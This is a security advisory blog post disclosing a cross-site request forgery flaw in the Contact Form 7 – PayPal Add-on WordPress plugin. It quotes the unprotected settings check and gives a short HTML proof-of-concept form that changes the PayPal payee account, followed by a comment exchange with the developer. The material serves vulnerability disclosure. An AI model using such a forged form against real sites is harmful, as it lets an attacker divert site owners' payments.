12 Jun

Cross-Site Request Forgery (CSRF) Vulnerability in Contact Form 7 – PayPal Add-on

After noticing a number of vulnerabilities in a couple of plugins that work with the plugin Contact Form 7 we started looking over other plugins that work with it. In doing that we found that the plugin Contact Form 7 – PayPal Add-on has a cross-site request forgery (CSRF) vulnerability in its code to save the plugin’s settings, which could be used to change the PayPal account that payments through the plugin are sent.

The issue is caused by a lack of a nonce in the form to change the plugin’s settings and a lack of a check to make sure a valid one is included when saving the plugin’s settings. When the plugin’s settings are saved through a request to plugin’s admin page the only thing that is required is that a POST input named “update” is included (in the file /paypal.php):

// save and update options
if (isset($_POST['update'])) {

We notified the developer of the issue several weeks ago, but so far we have not heard back from them, other than an automated response, and the vulnerability has not been fixed.

Proof of Concept

The following proof of concept will cause the PayPal account that payments go to, to be changed to test@example.com, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin.php?page=cf7pp_admin_table" method="POST">
<input type="hidden" name="update" value="1" />
<input type="hidden" name="liveaccount" value="test@example.com" />
<input type="submit" name="submit" value="Submit" />


  • May 18, 2017 – Developer notified.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for free when you sign up now.

2 thoughts on “Cross-Site Request Forgery (CSRF) Vulnerability in Contact Form 7 – PayPal Add-on

  1. This is not true and the proof of concept give has been tested does not work.

    When the plugin settings page saves the form it first checks to make sure that the user is logged in and has “manage_options” permissions.

    If the user is not already logged in and has “manage_options” permissions then they do not have the ability to change any of the plugin settings.

    Please delete this page or mark it as resolved.

    • The proof of concept mentions that that it works “when submitted as an Administrator”, so the person making the request would be logged in and have “manage_options” permissions. Since this is a cross-site request forgery (CSRF) vulnerability if it was being exploited the attacker would cause the Administrator to take the action, instead of them taking it themselves.

Leave a Reply

Your email address will not be published. Required fields are marked *